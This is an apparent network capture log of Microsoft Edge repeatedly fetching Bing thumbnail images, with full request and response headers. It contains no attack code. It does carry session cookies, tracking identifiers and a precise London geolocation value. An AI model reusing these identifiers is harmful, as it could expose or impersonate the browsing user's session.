cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 963
x-check-cacheable: YES
cache-control: public, max-age=1695661
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504e06
GET

https://th.bing.com/th?id=OSK.HEROD-bdfcZqvFucXXU3OOLsupJiezPhEh152Y8fjhUKjFs&w=384&h=228&c=1&rs=2&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.HEROD-bdfcZqvFucXXU3OOLsupJiezPhEh152Y8fjhUKjFs&w=384&h=228&c=1&rs=2&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1032
cache-control: public, max-age=1226345
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504e07
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.8faa4c81eed9d8c9be2a3d9b216dc9c8&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.8faa4c81eed9d8c9be2a3d9b216dc9c8&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 888
x-check-cacheable: YES
cache-control: public, max-age=546197
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504e08
GET

https://th.bing.com/th?id=OSK.d7cd4078f6a1e41638f732cf8cb624b3&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.d7cd4078f6a1e41638f732cf8cb624b3&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6660
x-check-cacheable: YES
cache-control: public, max-age=1193267
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504e09
GET

https://th.bing.com/th?id=OSK.05599d933da2bf7c64937a7b957a4018&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.05599d933da2bf7c64937a7b957a4018&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 709
x-check-cacheable: YES
cache-control: public, max-age=1218651
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504e05
GET

https://th.bing.com/th?id=OSK.12d207e0aac469eced49fe1bb0e6d997&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.12d207e0aac469eced49fe1bb0e6d997&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5707
cache-control: public, max-age=2412126
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504e29
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.d7f5f510a0ac4e291e226e0bf78da3f8&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.d7f5f510a0ac4e291e226e0bf78da3f8&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2619
x-check-cacheable: YES
cache-control: public, max-age=1356350
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504e2b
GET

https://th.bing.com/th?id=OSK.TMLNqhJkLVrp4vTjzMfIbH-P9IhS68LAT_gKdO53oRXCIrU&w=150&h=220&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.TMLNqhJkLVrp4vTjzMfIbH-P9IhS68LAT_gKdO53oRXCIrU&w=150&h=220&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
